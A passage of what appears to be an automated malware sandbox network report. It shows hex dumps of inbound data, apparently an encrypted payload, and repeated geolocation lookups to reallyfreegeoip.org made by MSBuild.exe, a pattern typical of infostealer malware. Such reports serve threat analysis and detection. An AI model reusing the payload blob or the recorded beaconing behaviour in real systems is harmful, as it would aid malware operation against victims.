2024-07-27 09:39:02 UTC	1369	IN	Data Raw: 57 8c 98 f2 a3 07 b7 4c 6c 0a 8e 6c 66 4c 59 7c 4c 7e d0 4c ea ea 3a 4d 35 4c 2b cf 4c 6c 9a a5 60 de 4c 59 f5 7b eb 8e 6b 7e 21 4c 59 4d 4c 2b a0 7e 9c 11 c0 14 10 5e c8 9a 4c 7e 46 4c ea ed eb 1d a7 38 6d b5 a2 65 82 4c ae ed 49 ad 73 88 cb c1 a6 f0 f4 8c 98 83 a3 07 c4 4c 6c a9 8e 6c d5 4c 59 0d 4c 7e 31 4c ea 33 47 41 47 4c 2b 2e 4c 6c 79 a5 60 3f 4c 59 84 7b eb 55 26 72 93 4c 59 ef 4c 2b 52 7e 9c b3 c0 14 be 00 74 79 4c 7e e5 4c ea 1c eb 1d 54 38 6d c7 a2 65 61 4c ae 1c 49 ad 02 88 cb 20 a6 f0 85 8c 98 60 a3 07 25 4c 6c 5b 8e 6c 34 4c 59 af 4c 7e 43 4c ea 4c ee b9 e4 4c 2b 9d 4c 6c 08 a5 60 4c 4c 59 66 7b eb 08 6d 5a 70 4c 59 1e 4c 2b f1 7e 9c c0 c0 14 e5 a9 5c 08 4c 7e 14 4c ea be eb 1d f6 38 6d 26 a2 65 d3 4c ae be 49 ad a1 88 cb 92 a6 f0 67 8c 98 Data Ascii: WLllfLY\|L~L:M5L+Ll`LY{k~!LYML+~^L~FL8meLIsLllLYL~1L3GAGL+.Lly`?LY{U&rLYL+R~tyL~LT8meaLI `%Ll[l4LYL~CLLL+Ll`LLYf{mZpLYL+~\L~L8m&eLIg
2024-07-27 09:39:02 UTC	1369	IN	Data Raw: 4c 2b 8a 4b 18 21 0b d8 f0 54 50 21 4c 7e bd 5a 4e 06 a9 5c b0 26 31 93 cd ad f6 66 a2 83 4c 59 1b 8f fc 45 4c ea 9b 4c 59 d3 4c 2b d2 37 30 81 4c ae 6b 4c 59 4b 74 f0 ed 4c ea b6 cc d8 b0 91 e5 c6 4c 6c 69 4c ae 00 3a 4d dc 9e ef 8e c0 77 0c 4c 59 44 4c 2b 69 4b 18 93 0b d8 81 54 50 93 4c 7e cf 5a 4e a5 a9 5c c2 26 31 70 cd ad 87 66 a2 60 4c 59 88 6e 1e e7 4c ea 78 4c 59 32 4c 2b 3f 4b 18 63 4c ae d8 4c 59 e8 74 f0 1c 4c ea 12 3a 4d 9b 1f 3a 01 f9 7a db 4c ae 36 4c 59 e8 c9 8a f4 7b ae 93 54 50 e6 4c 2b 7b a9 a8 31 48 9b b1 c4 c2 f1 cc bf d0 21 c6 72 4c 59 dd cc a9 c3 4c 6c 4c 4c ae d2 4c 59 b2 a6 a2 16 4c ea 09 4c 59 8f 63 85 28 4c 6c 51 8d 6f bd 49 ad a6 4c 7e be 4c ea b1 3a 4d 78 1f 3a 49 d6 41 3a 4c ae 45 4c 59 19 c9 8a 85 7b ae 70 54 50 17 4c 2b 0a Data Ascii: L+K!TP!L~ZN\&1fLYELLYL+70LkLYKtLLliL:MwLYDL+iKTPL~ZN\&1pf`LYnLxLY2L+?KcLLYtL:M:zL6LY{TPL+{1H!rLYLlLLLYLLYc(LlQoIL~L:Mx:IA:LELY{pTPL+
2024-07-27 09:39:02 UTC	1369	IN	Data Raw: 6c 88 db 08 fa b5 f0 9b 4c 7e 47 4c ea 5a 8e 9a d1 4d 2a 53 f7 b3 83 4c ae 68 4c 59 d7 3d 4e 3a aa bc af 06 00 3a 4c 2b c5 4c 6c e8 ce 2c d5 4d 58 8a 4a 48 30 4c ea 0e 4c 59 76 6f d9 b8 99 8b 9b 06 d2 3e 4c 59 90 4c 7e ca 8d 68 93 4d 58 13 37 e2 b3 4c 6c 3c 4c ae c2 ee b9 0d 59 98 ba 80 36 c2 d1 65 31 4c 2b 0a ce af 61 4d af 3b 7e aa 06 4c 7e 1e 4c ea 35 ee b9 ef eb 7e bd 73 35 f0 66 a2 35 4c 59 6d cf bc 43 4d eb 77 20 86 e5 4c 2b 9c 4c 6c 96 7c 1e db fa 8e 1c d7 83 d2 21 c6 71 4c 59 9c 8d ea c1 4d 6d f9 fb fb d1 4c 59 09 4c 7e a5 6d 5a 94 84 82 e9 d4 c3 2a 4c 6c d2 4c ae 5f eb 1d a4 4d 7f ff 0e a8 a7 4c 59 eb 4c 2b 66 7e 9c 4f db 08 4b b1 55 75 f6 72 e1 4c ea dc 8e 9a 15 4d 2a 87 a5 23 45 4c ae ef 4c 59 33 3d 4e bc aa bc 8e 53 a6 44 a3 07 21 4c 6c 2c ce Data Ascii: lL~GLZMSLhLY=N::L+Ll,MXJH0LLYvo>LYL~hMX7Ll<LY6e1L+aM;~L~L5~s5f5LYmCMw L+Ll\|!qLYMmLYL~mZLlL_MLYL+f~OKUurLM*#ELLY3=NSD!Ll,
2024-07-27 09:39:02 UTC	1369	IN	Data Raw: 5f 3b 4c ec e0 66 ec 4c ea f5 8e 9a 2c 0a 1e 9e f1 f5 68 4c ae d6 4c 59 3e 3d 4e 23 1e fb 3e ed bb 45 4c 2b 2c 4c 6c 32 e9 2a 3c 4d 58 17 69 fb 4a 4c ea 91 4c 59 0f 6f d9 c6 99 8b 9d 7e 1c 79 47 41 7a 4c 7e 27 8d 68 6c da 7c e8 a6 b2 c8 4c 6c 62 4c ae 2b ee b9 d7 9e ef ae 6f 59 07 4c 59 4b 4c 2b 92 a9 a8 db 4d af 0e a7 e0 ad 4c 7e 41 4c ea 4f ee b9 32 eb 7e f8 6a 2a ad 73 36 4f 4c 59 f3 cf bc 7c 4b df aa 05 02 1c 4c 2b c2 4c 6c 7d 7c 1e c2 5e c8 39 3e 4d 17 4c ea 08 4c 59 c4 1a cd 28 4d 6d c0 9d bf 38 4c 59 a7 4c 7e 5f 6d 5a 72 fa 8e bb 9f b8 65 7e 9c 3b 4c ae c6 8e 9a 6a 7b eb ba 66 30 5c 4c 59 16 4c 2b dd 7e 9c 96 9d bf 0c ed bb 00 4c 7e 18 4c ea 86 49 ad bf 4d 2a fc 74 71 ef 4c ae 32 4c 59 48 3d 4e e2 aa bc 1c b8 cf 01 6f d9 9b 4c 6c b2 ce 2c 9f da 7c Data Ascii: _;LfL,hLLY>=N#>EL+,Ll2<MXiJLLYo~yGAzL~'hl\|LlbL+oYLYKL+ML~ALO2~js6OLY\|KL+Ll}\|^9>MLLY(Mm8LYL~_mZre~;Lj{f0\LYL+~L~LIM*tqL2LYH=NoLl,\|
2024-07-27 09:39:02 UTC	1369	IN	Data Raw: 4c 7e fd a1 06 ff 2f 7a b3 0b 1f 9a a9 a8 da 46 92 3f 4c 59 91 4c 7e cd 5a 4e c8 84 82 6f ce ab b2 4c 6c 3d 4c ae 04 eb 1d 1f c9 8a c0 4b df 64 c4 c2 30 4c 2b ca 4c 6c c1 7c 1e 94 15 11 af 41 96 3e 3f cb ac e4 a1 e4 d7 c1 91 a9 a8 24 c0 14 08 12 e5 af 4c 7e 43 4c ea e8 eb 1d f0 29 fd 9c 4d 6d 2c b0 b4 4c 4c 59 73 4c 7e 08 6d 5a 65 da 7c 21 26 31 c1 4c 6c 4f 4c ae 22 ee b9 44 30 36 bc 17 42 2b fd 68 ea d7 c1 97 51 84 14 e9 2a 95 f5 b2 30 1a da bc 4c ea a6 4c 59 8d 38 6d 92 0a 59 26 b0 b4 c7 8c 98 c8 9b 5a e0 4c ea 2c 6e 38 15 4c 2b 7f 4c 6c 44 4c ae 6d ce da 02 4c 7e 1a 4c ea cd 10 e6 9f ef 19 f7 fb 78 1a e9 2a 83 ff 6a aa 4c 7e b6 4c ea 6d 49 ad 38 65 72 18 8c ec 32 4c ae 49 4c 59 11 c9 8a 89 7b ae 60 da 7c 10 51 25 74 4c 6c 4a 4c ae 07 ee b9 41 30 36 b9 Data Ascii: L~/zF?LYL~ZNoLl=LKd0L+Ll\|A>?$L~CL)Mm,LLYsL~mZe\|!&1LlOL"D06B+hQ0LLY8mY&ZL,n8L+LlDLmL~LxjL~LmI8er2LILY{`\|Q%tLlJLA06
2024-07-27 09:39:02 UTC	1369	IN	Data Raw: ea 90 4c 59 d4 a3 07 b1 4c 6c 87 66 a2 60 4c 59 84 c0 16 96 7e 88 78 4c 59 c2 7e 49 9b 1f ff 63 4c ae d8 4c 59 04 4c 7e b2 b6 60 87 8c 98 56 e4 f1 27 4c 6c 03 54 81 36 4c 59 ac 4c 7e 40 4c ea 15 10 e6 e6 4c 2b 9f 4c 6c 0a a5 60 4e 4c 59 70 4c 7e 79 1e fb 6a c6 c1 1d 4c 2b c3 4c 6c 0a 0b d8 d2 4c 59 b5 50 84 22 4a de bd eb 1d 53 dd fa 58 2c 0c c5 b8 bb d5 b7 f2 a6 4c 7e be 4c ea 45 ee b9 be 8a 9c aa 77 73 85 50 84 c0 28 9c 85 07 12 e5 da cc 63 c4 c2 a7 6f d9 c1 a2 65 ec d1 05 ed 4c 59 1f 24 60 79 7d 8a d4 da 7c 30 05 91 22 4c 6c ee 4c ae 93 ee b9 13 74 f0 55 6d 5a 4d 2b 9f 0a 47 d2 aa be 5c 31 4c ae 4b 4c 59 13 c9 8a 5c 1e fb 5b b1 55 18 4c 2b 76 4c 6c fd 0b d8 7c c4 c2 37 57 42 df a1 06 34 30 95 e2 eb 7e 5b 59 0b 2b c6 12 1c 4c 59 60 cf bc bc da cc 31 5e Data Ascii: LYLlf`LY~xLY~IcLLYL~`V'LlT6LYL~@LL+Ll`NLYpL~yjL+LlLYP"JSX,L~LEwsP(coeLY$`y}\|0"LlLtUmZM+G\1LKLY\[UL+vLl\|7WB40~[Y+LY`1^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	188.114.96.3	443	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:08 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:39:08 UTC	703	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2217 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RXmrvEvZtPxBlYRK%2BFa4c7TzA4yHT5KesYJdTw4KGYX6MxbUExIWy%2FitOcHQ3MgvRKaD5PKGKXkjZw36TxwZRXe463xwWKVKloQqr0JmYKl6JCGPD94QbmKLvauFiJPrAVIIvXic"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba9198d50429a-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:08 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:39:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	188.114.96.3	443	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:10 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-27 09:39:10 UTC	709	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2219 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eEC8TV36gEZTQ5P4umcbdvuY6JITH2%2FsiibXpUheCQ1CBEl0CCb4Hgo6WiBmA9RnKWob3kdpyeohz5gh%2FEzDmGe0kmjE%2B228h%2Bdcl6ZXkYm7Mr3w14zJtWRMLNkA3s1YM%2FZGvNvp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba924bc1141d9-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:10 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:39:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49736	188.114.96.3	443	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:12 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-27 09:39:12 UTC	705	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2221 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLA5dLUrHiwwM7qCRxJqv68O8wdSjaewEQBF5nZ09t5DuJ4mQ5o4wW49%2Boyy6Z4HdvTaaSHVy1B1uvBRoIlIwSFbDwBhFhEkzj%2BKbTWPCUqGbTpR40Ey2y3N60q5IJK9d%2Fv4lem3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba9333c69c461-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:12 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:39:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49738	188.114.96.3	443	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:15 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-27 09:39:15 UTC	701	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:15 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2224 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LVpBldsoJN6qyEvixpo0TNUhWkTpBdjEjzp6pY6sg54gCvmmr3PxXTFQ7rf%2F5pAP7OBAqv10DhL6cXDdo345Kgp9GdVIUcnrJu9lc7kILiATqd7fZVGHV1yBSdIDzWdztzqSMvK0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba9463bf319eb-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:15 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:39:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	188.114.96.3	443	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:19 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:39:19 UTC	707	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:19 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2228 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=481f%2F3v1gYK9TylxCBpjt4X4BsiBPPBp%2F2GJK7i1F21BJu%2FR2WO5abZJNtlXtPS%2F8GDv9N02QXJfStBmg7Wm5KjDcTi8K2Bugn9F4UnQp52IAzDB5nqZlLjvqzI9zYhUn2bJySBW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba9616a2e8c90-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:19 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:39:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	188.114.96.3	443	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:22 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:39:22 UTC	701	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2231 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ORTwOyyketxSne9TyMDFmnSxyJKmsadOOHfMdIbUDKvgksZO93kYifmszZcucOtamWeq9rjK8y%2BAs6tpB9NQCbpyVc4IDNYyz5wrmjJ0EGnW2fIaz6HOLfveyCkGUlJVNeKp30p2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba973db5e198e-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:22 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-27 09:39:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	188.114.96.3	443	6400	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 09:39:24 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-27 09:39:24 UTC	711	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:39:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2233 Last-Modified: Sat, 27 Jul 2024 09:02:11 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5oZ53WROz%2BjaZRF8Lqv3nagsC1BpD7sY61uFiUzt8%2Bntt5iXj1fMIbGd1a1jm5hojki%2B02SwN56R9HBUcES%2FanovU9C0%2FvcFb7GeXDmdz3KRCqFlRWO69B1EuUWag%2BzXevDPjU5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ba980affe443e-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 09:39:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
